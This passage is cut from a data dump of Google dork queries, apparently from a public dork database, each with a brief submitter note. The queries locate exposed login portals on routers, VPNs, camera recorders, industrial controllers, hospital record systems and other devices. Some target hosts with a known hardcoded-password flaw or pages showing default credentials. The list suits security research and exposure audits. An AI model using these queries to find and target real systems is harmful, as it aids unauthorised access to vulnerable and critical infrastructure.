Bernardo\r\n\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:nidp/idff/sso", "description": "# Google Dork: inurl:nidp/idff/sso\r\n# Pages Containing Login Portals\r\n# Date: 12/10/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:idp/Authn/UserPassword", "description": "# Google Dork: inurl:idp/Authn/UserPassword\r\n# Date: 12/17/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:adfs inurl:wctx inurl:wtrealm -microsoft.com", "description": "Dork: inurl:adfs inurl:wctx inurl:wtrealm -microsoft.com\r\n\r\nDescription:\r\nFinding ADFS Login Panels\r\n\r\nThank you"}, {"dork": "intitle:\"Humatrix 8\"", "description": "# Exploit Title: HUMANICA Humatrix login portals\r\n# Google Dork: intitle:\"Humatrix 8\"\r\n# Author: Kitchaphan Singchai (idealphase)\r\n# Category: Pages Containing Login Portals"}, {"dork": "intitle:\"Exchange Log In\"", "description": "# Google Dork: intitle:\"Exchange Log In\"\r\n# Description: Microsoft Exchange login page 2006\r\n# Author: Saleh Al Zadjali (https://om.linkedin.com/in/saleh-alzadjali)\r\n\r\nBR,\r\nSaleh Al-Zadjali"}, {"dork": "inurl:oidc/authorize", "description": "# Google Dork: inurl:oidc/authorize\r\n# Date: 12/21/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:authorization.ping", "description": "Google Dork: inurl:authorization.ping\r\nDescription: Pages containing portals for login or employee account recovery.\r\nDate: 01/01/2021\r\nAuthor: Sunil Singh"}, {"dork": "intitle:Login intext:HIKVISION inurl:login.asp?", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "inurl:weblogin intitle:(\"USG20-VPN\"|\"USG20W-VPN\"|USG40|USG40W|USG60|USG60W|USG110|USG210|USG310|USG1100|USG1900|USG2200|\"ZyWALL110\"|\"ZyWALL310\"|\"ZyWALL1100\"|ATP100|ATP100W|ATP200|ATP500|ATP700|ATP800|VPN50|VPN100|VPN300|VPN000|\"FLEX\")", "description": "# Google Dork: inurl:weblogin\r\nintitle:(\"USG20-VPN\"|\"USG20W-VPN\"|USG40|USG40W|USG60|USG60W|USG110|USG210|USG310|USG1100|USG1900|USG2200|\"ZyWALL110\"|\"ZyWALL310\"|\"ZyWALL1100\"|ATP100|ATP100W|ATP200|ATP500|ATP700|ATP800|VPN50|VPN100|VPN300|VPN000|\"FLEX\")\r\n# Zyxel hardcoded password vuln hosts finder\r\n# Date: 1/6/2021\r\n# Exploit Author: Javier Bernardo\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "site:p2.*.* intitle:\"login\"", "description": "site:p2.*.* intitle:\"login\"\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "inurl:jasperserver-pro/login.html", "description": "inurl:jasperserver-pro/login.html\r\nAuthor : Ali Hassam"}, {"dork": "intitle:\"phpLDAPadmin\" inurl:cmd.php", "description": "# Dork : intitle:\"phpLDAPadmin\" inurl:cmd.php\r\n# PhpLdapAdmin Server Login Portals\r\n# Author : Ambadi MP"}, {"dork": "intitle:\"iLO: localhost\" + \"Firmware Version\"", "description": "# Google Dork: intitle:\"iLO: localhost\" + \"Firmware Version\"\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 28/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Cisco Email Security Virtual Appliance\" inurl:csrfkey=", "description": "# Google Dork: intitle:\"Cisco Email Security Virtual Appliance\" inurl:csrfkey=\r\n\r\n# Cisco Email Security Virtual Appliance login portals.\r\n\r\n# Date: 3/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME\" inurl:\"status.php\"", "description": "Dork: intitle:\"D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME\" inurl:\"status.php\""}, {"dork": "inurl:index.php?s=/Admin/Public/login.html", "description": "Dork: inurl:index.php?s=/Admin/Public/login.html"}, {"dork": "inurl:ext/pwdreset", "description": "# Google Dork: inurl:ext/pwdreset\r\n# Date: 2/9/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\n\r\n*Ethical Hacker | Information Security Engineer*"}, {"dork": "intitle:\"Radius Manager\" intext:\"Control Panel\"", "description": "# Google Dork: intitle:\"Radius Manager\" intext:\"Control Panel\"\r\n# Find Radius ISP control panels\r\n# Date: Feb. 8th,2020\r\n# Author: Kike Fontan"}, {"dork": "inurl:simplesaml/module", "description": "# Google Dork: inurl:simplesaml/module\r\n# Date: 2/15/2020\r\n# Exploit Author: Javier Bernardo\r\n# Pages Containing Login Portals\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:ushell/shells/abap", "description": "# Google Dork: inurl:ushell/shells/abap\r\n# Date: 2/15/2020\r\n# Exploit Author: Javier Bernardo\r\n# Pages Containing Login Portals\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "\"Username\" \"Password\" \"Please login to continue\" intitle:\"F660\"", "description": "# Dork: \"Username\" \"Password\" \"Please login to continue\" intitle:\"F660\""}, {"dork": "intitle:\"oracle business intelligence sign in\"", "description": "Google dork description: Oracle Business Intelligence Sign in page\r\n\r\nGoogle Search: inurl:\"intitle:\"oracle business intelligence sign in\"\"\r\n\r\nSubmitted by: Alfie\r\n\r\n\r\n-- \r\nRegards,\r\nAlfie."}, {"dork": "inurl:ui/login intitle:jfrog", "description": "# Google Dork: inurl:ui/login intitle:jfrog\r\n# Date: 2/8/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: Pages Containing Login Portals\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "intitle:\"ZXHN H108N\" intext:\"Welcome to ZXHN H108N\"", "description": "# Dork: intitle:\"ZXHN H108N\" intext:\"Welcome to ZXHN H108N\""}, {"dork": "inurl:ejbexplorer", "description": "# Google Dork: inurl:ejbexplorer\r\n# Date: 2/15/2020\r\n# Exploit Author: Javier Bernardo\r\n# Pages Containing Login Portals\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer\r\nBuenos Aires - Argentina"}, {"dork": "intitle:\"WEB LCT\" intext:\"Web local craft terminal\"", "description": "# Dork: intitle:\"WEB LCT\" intext:\"Web local craft terminal\""}, {"dork": "Copyright Huawei Technologies co. Ltd \"Account\" \"Password\" -site:huawei.com", "description": "# Dork: Copyright Huawei Technologies co. Ltd \"Account\" \"Password\" -site:huawei.com"}, {"dork": "\"Username\" \"Password\" \"Please login to continue\" intitle:\"F670\"", "description": "# Dork: \"Username\" \"Password\" \"Please login to continue\" intitle:\"F670\""}, {"dork": "site:*.com inurl:axis2-admin", "description": "Dork: site:*.com inurl:axis2-admin"}, {"dork": "intitle:\"Blue Iris Login\"", "description": "# Google Dork: intitle:\"Blue Iris Login\"\r\n\r\n# Various online devices (Blue Iris Video surveillance login portals).\r\n\r\n# Date: 03/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/dana-na/auth/url_default/welcome.cgi \"VPN\"", "description": "# Google Dork: inurl:/dana-na/auth/url_default/welcome.cgi \"VPN\"\r\n# VPN login portals.\r\n# Date: 04/03/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*.herokuapp.com intitle:login", "description": "# Dork: site:*.herokuapp.com intitle:login"}, {"dork": "intitle:\"Sign in to Cisco Finesse\"", "description": "# Exploit Title: Cisco Finesse login portal\r\n# Google Dork: intitle:\"Sign in to Cisco Finesse\"\r\n# Author: Kitchaphan Singchai (idealphase)\r\n# Category: Pages Containing Login Portals"}, {"dork": "inurl:pandora_console intitle:\"Pandora FMS\"", "description": "# Google Dork: intitle:\"Radius Manager\" intext:\"Control Panel\"\r\n# Find Pandora FMS control panels\r\n# Date: Mar. 13th,2021\r\n# Author: Kike Fontan\r\n# Reference: https://pandorafms.com/docs/index.php?title=Pandora:Documentation_es:Interfaz"}, {"dork": "intext:\"helpdesk software provided by deskpro\"", "description": "Dear Team,\r\n\r\nThe dork will display Pages Containing Login Portals.\r\n\r\nintext:\"helpdesk software provided by deskpro\"\r\n\r\n-- \r\nThanks & Regards,\r\nAnon Tuttu Venus"}, {"dork": "inurl:\"login.rsp\" \"Language\" -.com", "description": "# Google Dork: inurl:\"login.rsp\" \"Language\" -.com\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 15/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:webdynpro/dispatcher", "description": "# Google Dork: inurl:webdynpro/dispatcher\r\n# Date: 3/18/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar"}, {"dork": "intitle:\"NUUO Network Video Recorder Login\" \"Language\"", "description": "# Google Dork: intitle:\"NUUO Network Video Recorder Login\" \"Language\"\r\n\r\n# NUUO Network Video Recorder Login pages.\r\n\r\n# Date: 17/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:template.gch \"ZTE Corporation.\"", "description": "# Google Dork: inurl:template.gch \"ZTE Corporation.\"\r\n# Date: 18/03/2021\r\n# Exploit Author: Cuma KURT\r\n# Pages Containing Login Portals\r\n\r\nCuma KURT\r\n*Ethical Hacker | \u0130nformation Security Engineer\r\nIstanbul - Turkey"}, {"dork": "inurl:Main_Login.asp AND intext:\"Sign in with your ASUS router account\"", "description": "# Google Dork: inurl:Main_Login.asp AND intext:\"Sign in with your ASUS router account\"\r\n# Date: 18/03/2021\r\n# Exploit Author: Cuma KURT\r\n# Pages Containing Login Portals\r\n\r\nCuma KURT\r\n*Ethical Hacker | Information Security Engineer\r\nIstanbul - Turkey"}, {"dork": "intitle:\"Component Browser Login\"", "description": "# Exploit Title: Adobe Coldfusion login portal\r\n# Google Dork: intitle:\"Component Browser Login\"\r\n# Author: Kitchaphan Singchai (idealphase)\r\n# Category: Pages Containing Login Portals"}, {"dork": "inurl:\"/deltaweb/hmi_login.asp\" intext:\"login\"", "description": "# Google Dork: inurl:\"/deltaweb/hmi_login.asp\" intext:\"login\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 06/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/login.htm\" \"Hitron Technologies\"", "description": "# Google Dork: intitle:\"Login\" \"Please sign in to EP SmartStart\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 12/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"UniFi Video\" \"login\" \"NVR\"", "description": "# Google Dork: intitle:\"UniFi Video\" \"login\" \"NVR\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 08/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Login\" intext:\"Herospeed Technology\"", "description": "# Google Dork: intitle:\"Login\" intext:\"Herospeed Technology\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 13/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"login\" \"Are you a patient\" \" eRAD\"", "description": "# Google Dork: intitle:\"login\" \"Are you a patient\" \" eRAD\"\r\n\r\n# Pages Containing Login Portals(EMR Systems)\r\n\r\n# Date: 15/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Frontier e-HR Login Page\"", "description": "# Google Dork: intitle:\"Frontier e-HR Login Page\"\r\n\r\n# Pages Containing Login Portals(EMR Systems)\r\n\r\n# Date: 15/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:b2b/init.do", "description": "Logins\r\n\r\n# Google Dork: inurl:b2b/init.do\r\n# Date: 4/18/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar"}, {"dork": "intitle:\"Web user login\"", "description": "# Google Dork: intitle:\"Web user login\"\r\n# Date: 4/18/2020\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intitle:\"DIAM4 Login\"", "description": "# Google Dork: intitle:\"DIAM4 Login\"\r\n\r\n# Pages Containing Login Portals(EMR Systems)\r\n\r\n# Date: 15/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Sauter moduWeb - Login\"", "description": "# Google Dork: intitle:intitle:\"Sauter moduWeb - Login\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 12/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Greentree eHR\" \"Employee Code\"", "description": "# Google Dork: intitle:\"Greentree eHR\" \"Employee Code\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 15/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Payvand PACS\"", "description": "# Google Dork: intitle:\"Payvand PACS\"\r\n\r\n# Pages Containing Login Portals(EMR Systems)\r\n\r\n# Date: 15/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intext:\"Please select your account\" intext:\"SSL Login\"", "description": "# Dork: intext:\"Please select your account\" intext:\"SSL Login\""}, {"dork": "intitle:\"iLo\" \"Hewlett Packard Enterprise Development\" \"Firmware Version\" \" Local user name:\"", "description": "# Google Dork: intitle:\"iLo\" \"Hewlett Packard Enterprise Development\" \"Firmware Version\" \"Local user name:\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 20/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"NetScaler AAA\" inurl:logon/LogonPoint/tmindex.html", "description": "# Google Dork: intitle:\"NetScaler AAA\" inurl:logon/LogonPoint/tmindex.html\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 29/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Please Login\" inurl:\"/remote/login?lang=en\"", "description": "# Dork: intitle:\"Please Login\" inurl:\"/remote/login?lang=en\""}, {"dork": "intitle:\"Gophish - Login\"", "description": "# Dork: intitle:\"Gophish - Login\"\r\n# This dork found Gophish login panel.\r\n# Category : Pages Containing Login Portals\r\n# Author : Murat DEM\u0130RC\u0130"}, {"dork": "inurl:sslvpn_logon.shtml", "description": "#Dork: inurl:sslvpn_logon.shtml - By Simone Crema"}, {"dork": "intitle:\"ReACT Self-serve\"", "description": "# Dork: intitle:\"ReACT Self-serve\""}, {"dork": "inurl:glpi intitle:\"GLPI\" site:.br", "description": "# Google Dork: inurl:glpi intitle:\"GLPI\" site:.br\r\n# Dork Author: J3di M0nk"}, {"dork": "intext:\"Cisco Webui - Login\" -www -cisco.com", "description": "# Dork: intext:\"Cisco Webui - Login\" -www -cisco.com\r\n\r\nRegards,\r\nShezad Master"}, {"dork": "intitle:\"TOTOLINK\" inurl:\"/login.htm\"", "description": "# Dork: intitle:\"TOTOLINK\" inurl:\"/login.htm\"\r\n# (TOTOLink Router) Various Online Devices\r\n# Exploit Author: Shivani Arya"}, {"dork": "intitle:\"grafana\" inurl:\"/grafana/login\" \"Forgot your password\"", "description": "# Google Dork: intitle:\"grafana\" inurl:\"/grafana/login\" \"Forgot your password\"\r\n\r\n# Pages Containing Online Portals\r\n\r\n# Date: 03/05/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "Google Dork: inurl:\"/zm/index.php\"", "description": "# Google Dork: inurl:\"/zm/index.php\"\r\n# Description: Find ZoneMinder (video surveillance software) login portals.\r\n# Date: 05/10/2021.\r\n# Exploit Author: Sohaib E.B.\r\n# Category: Pages Containing Login Portals."}, {"dork": "intitle:\"Login\" intext:\"(Moka pot)\" inurl:\"login.php\"", "description": "# Dork: intitle:\"Login\" intext:\"(Moka pot)\" inurl:\"login.php\""}, {"dork": "intitle:\"GLPI - Authentication\"", "description": "# Dork: intitle:\"GLPI - Authentication\""}, {"dork": "intext:clave inurl:admin.php", "description": "# Exploit Title: Pages containing login portals\r\n# Google Dork: intext:clave inurl:admin.php\r\n# Date: 2021-05-14\r\n# Exploit Author: Aniket Prabhakar"}, {"dork": "intitle:\"Teampass\" intext:\"Server Time\"", "description": "# Dork: intitle:\"Teampass\" intext:\"Server Time\""}, {"dork": "intitle:\"Gargoyle Router Management Utility\" intext:\"Enter Admin Password\"", "description": "# Dork: intitle:\"Gargoyle Router Management Utility\" intext:\"Enter Admin Password\""}, {"dork": "\"Saferoads VMS\" \"login\"", "description": "# Dork: \"Saferoads VMS\" \"login\"\r\n# Find login portals for Roadsigns"}, {"dork": "intitle:\"OpenWrt - LuCI\" intext:\"Powered by LuCI | OpenWrt\"", "description": "# Google Dork: intitle:\"OpenWrt - LuCI\" intext:\"Powered by LuCI | OpenWrt\"\r\n# Pages Containing Login Portals\r\n# Date: 22/04/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Plesk Obsidian\" inurl:login_up.php", "description": "# Dork: intitle:\"Plesk Obsidian\" inurl:login_up.php"}, {"dork": "\"Name\" \"Password\" intitle:\"Business LAN\"", "description": "\"Name\" \"Password\" intitle:\"Business LAN\""}, {"dork": "intitle:LANCOM intitle:login \"LANCOM Systems GmbH\"", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: intitle:LANCOM intitle:login \"LANCOM Systems GmbH\"\r\n# Date: 2021-05-20\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "Zenario CMS Login Page", "description": "# Google Dork: Zenario CMS Login Page\r\n# Date: 24th May 2021\r\n# Exploit Author: Harsh Joshi, Omkar Ghaisas , Amit Chavare\r\n# Dork : intitle:\"Welcome to Zenario\"\r\n\r\n\r\n*Thanks*\r\n\r\n*Harsh Joshi"}, {"dork": "inurl:/index.php/admin/authentication/ intext:clave", "description": "# Exploit Title: Pages containing login portals\r\n# Google Dork: inurl:/index.php/admin/authentication/ intext:clave\r\n# Date: 2021-05-14\r\n# Exploit Author: Aniket Prabhakar (prabhakar123456aniket@gmail.com)"}, {"dork": "intext:\"Powered by Synnefo\"", "description": "# Dork: intext:\"Powered by Synnefo\""}, {"dork": "inurl:EMSWebClient/Login.aspx", "description": "#Exploit Title : Pages Containing Login portals.\r\n#Google Dork : inurl:EMSWebClient/Login.aspx\r\n#Exploit Author: Md Anzaruddin\r\n\r\n#Regards\r\n#Md Anzaruddin"}, {"dork": "intitle:\"ONU\" intext:\"Please login to continue...\"", "description": "# Dork: intitle:\"ONU\" intext:\"Please login to continue...\""}, {"dork": "intitle:\"Scalance web management\" \"Switch to insecure HTTP\"", "description": "# Google Dork: intitle:\"Scalance web management\" \"Switch to insecure HTTP\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 29/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Login\" inurl:web/frame/login.html?ssl=", "description": "# Google Dork: intitle:\"Login\" inurl:web/frame/login.html?ssl=\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Huawei Inner Web\"", "description": "# Dork: intitle:\"Huawei Inner Web\""}, {"dork": "intitle:\"Viewer for Samsung NVR\"", "description": "# Google Dork: intitle:\"Viewer for Samsung NVR\"\r\n# Date: 28/05/2021\r\n# Exploit Author: Cuma KURT\r\n# Pages Containing Login Portals\r\n\r\nCuma KURT\r\n*Ethical Hacker | \u0130nformation Security Engineer\r\nIstanbul - Turkey"}, {"dork": "\"Yeastar Information Technology Co., Ltd. All Rights Reserved.\" -yeastar.com", "description": "# Dork: \"Yeastar Information Technology Co., Ltd. All Rights Reserved.\" -yeastar.com"}, {"dork": "intitle:\"Ubiquiti\" intext:\"Please login to manage your wireless device.\"", "description": "# Dork: intitle:\"Ubiquiti\" intext:\"Please login to manage your wireless device.\""}, {"dork": "intitle:\"Webmodule\" inurl:\"/webmodule-ee/login.seam\" \"Version\"", "description": "# Google Dork: intitle:\"Webmodule\" inurl:\"/webmodule-ee/login.seam\" \"Version\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 03/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"GLPI - \u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f\" intext:\"GLPI Copyright\"", "description": "# Google Dork: intitle:\"GLPI - \u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f\" intext:\"GLPI Copyright\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 09/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Schneider Electric Telecontrol - Industrial Web Control\" intext:\"Xflow \"", "description": "# Google Dork: intitle:\"Schneider Electric Telecontrol - Industrial Web Control\" intext:\"Xflow\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 07/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"login - otrs\" \"Login\" \"Powered by OTRS\"", "description": "# Google Dork: intitle:\"login - otrs\" \"Login\" \"Powered by OTRS\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 17/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/sslvpn_logon.shtml\" intitle:\"User Authentication\" \"WatchGuard Technologies\"", "description": "# Google Dork: inurl:\"/sslvpn_logon.shtml\" intitle:\"User\r\nAuthentication\" \"WatchGuard Technologies\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 21/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Plesk\" inurl:\"/login_up.php3\" \"Parallels IP Holdings GmbH\"", "description": "# Google Dork: intitle:\"Plesk\" inurl:\"/login_up.php3\" \"Parallels IP\r\nHoldings GmbH\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 21/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"ISPConfig\" \"Powered by ISPConfig\" \"login\"", "description": "# Google Dork: intitle:\"ISPConfig\" \"Powered by ISPConfig\" \"login\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 14/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:/web-ftp.cgi", "description": "# Google Dork: inurl:/web-ftp.cgi\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 1/07/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"XVR LOGIN\" inurl:\"/login.rsp\"", "description": "# Google Dork: intitle:\"XVR LOGIN\" inurl:\"/login.rsp\"\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 29/06/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"iMana 200 login\"", "description": "# Dork: intitle:\"iMana 200 login\""}, {"dork": "intitle:\"WebMO Login\" inurl:/~webmo/cgi-bin/login.cgi", "description": "# Google Dork: intitle:\"WebMO Login\" inurl:/~webmo/cgi-bin/login.cgi\r\n\r\n# Pages Containing Login Portals.\r\n\r\n# Exploit Author: Sarmad Khan"}, {"dork": "inurl:/psp/ intext:\"ORACLE PEOPLESOFT\"", "description": "# Google Dork: inurl:/psp/ intext:\"ORACLE PEOPLESOFT\"\r\n\r\n# Pages Containing Login Portals.\r\n\r\n# Exploit Author: Sarmad Khan"}, {"dork": "intitle:\"Nutanix Web Console\"", "description": "# Exploit Title: Pages Containing Login Portals\r\n\r\n# Google Dork: intitle:\"Nutanix Web Console\"\r\n\r\n# Date: 2021-06-28\r\n\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:\"Identity Services Engine\" inurl:login.jsp", "description": "# Google Dork: intitle:\"Identity Services Engine\" inurl:login.jsp\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 20/07/2021\r\n\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "site:*.zendesk.com/auth/v2/login/registration", "description": "# Google Dork: site:*.zendesk.com/auth/v2/login/registration\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Exploit Author: Ritesh Gohil"}, {"dork": "intext:\"Switch Administrator\" inurl:config/log_off_page", "description": "# Google Dork: intext:\"Switch Administrator\" inurl:config/log_off_page\r\n\r\n# Category: Pages Containing Login Portals\r\n\r\n# Date: 05/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:\"pages/sdcall/Login.jsp\"", "description": "# Google Dork: inurl:\"pages/sdcall/Login.jsp\"\r\n\r\n# Pages Containing Login Portals (Cisco ServiceGrid)\r\n\r\n# Date: 21/07/2021\r\n\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intext:Paessler AG - The Network Monitoring Company inurl:/index.htm intitle:\"Welcome | PRTG Network Monitor\" -\"User Manual\"", "description": "# Google Dork: intext:Paessler AG - The Network Monitoring Company inurl:/index.htm intitle:\"Welcome | PRTG Network Monitor\" -\"User Manual\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 21/07/2021\r\n\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intext:\"Lancom\" intitle:\"Router - Login\" -.com", "description": "# Google Dork: intext:\"Lancom\" intitle:\"Router - Login\" -.com\r\n\r\n# Category: Pages Containing Login Portals\r\n\r\n# Date: 03/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "\"FM Monitoring Receiver\" intitle:\"login\" \"welcome!\"", "description": "# Google Dork: \"FM Monitoring Receiver\" intitle:\"login\" \"welcome!\"\r\n\r\n# Category: Pages Containing Login Portals\r\n\r\n# Date: 05/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:/UserLogin intitle:\"::PayTV SMS::\" \"Aplomb Technology\"", "description": "# Google Dork: inurl:/UserLogin intitle:\"::PayTV SMS::\" \"Aplomb Technology\" \r\n\r\n# Date: 23/07/2021 \r\n\r\n# Exploit Author: Neha Singh\r\n\r\n# Pages Containing Login Portals"}, {"dork": "intext:\"SGP\" inurl:/accounts/login?next=/admin/", "description": "# Google Dork: intext:\"SGP\" inurl:/accounts/login?next=/admin/\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:\"/tips/tipsLogin.action\"", "description": "# Google Dork: inurl:\"/tips/tipsLogin.action\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Grandstream Device Configuration\" (intext:password & intext:\"Grandstream Device Configuration\" & intext:\"Grandstream Networks\" | inurl:cgi-bin) -.com|org", "description": "# Google Dork: intitle:\"Grandstream Device Configuration\" (intext:password\r\n& intext:\"Grandstream Device Configuration\" & intext:\"Grandstream Networks\"\r\n| inurl:cgi-bin) -.com|org\r\n\r\n# Category: Pages Containing Login Portals\r\n\r\n# Date: 06/08/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"3G wireless gateway\" \"login\" intext:\"huawei technologies\"", "description": "# Google Dork: intitle:\"3G wireless gateway\" \"login\" intext:\"huawei technologies\"\r\n# Category: Various Online Devices\r\n# Date: 09/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"ADB Broadband\" login intext:\"ADB Broadband S.p.A\" -.com", "description": "# Google Dork: intitle:\"ADB Broadband\" login intext:\"ADB Broadband S.p.A\" -.com\r\n# Category: Various Online Devices\r\n# Date: 09/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"MediaAccess Gateway - Login\" \"access your MediaAccess Gateway\"", "description": "# Google Dork: intitle:\"MediaAccess Gateway - Login\" \"access your MediaAccess Gateway\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 09/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"ADMINISTRATOR LOGIN\" inurl:adminlogin", "description": "GOOGLE DORK: intitle:\"ADMINISTRATOR LOGIN\" inurl:adminlogin\r\n\r\nGIVES THE ADMINISTRATOR LOGIN PANELS"}, {"dork": "intitle:\"geovision inc.\" inurl:login.htm", "description": "# Google Dork: intitle:\"geovision inc.\" inurl:login.htm\r\n# Category: Various Online Devices\r\n# Date: 06/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"KNX-IP-Gateway Login\"", "description": "# Google Dork: intitle:\"KNX-IP-Gateway Login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"DGS-3100 Login\"", "description": "# Google Dork: intitle:\"DGS-3100 Login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "allintext:Welcome to the LabTech Web Portal", "description": "# Google Dork: allintext:Welcome to the LabTech Web Portal\r\n# LabTech Web Portal\r\n# Date: 10-07-2021\r\n# Exploit Author: Kamran Saifullah"}, {"dork": "intitle:\"Vue Element Admin\" intext:\"Username : admin\" OR intext:\"Username : editor\" OR intext:\"Password : any\"", "description": "# Google Dork : intitle:\"Vue Element Admin\" intext:\"Username : admin\" OR intext:\"Username : 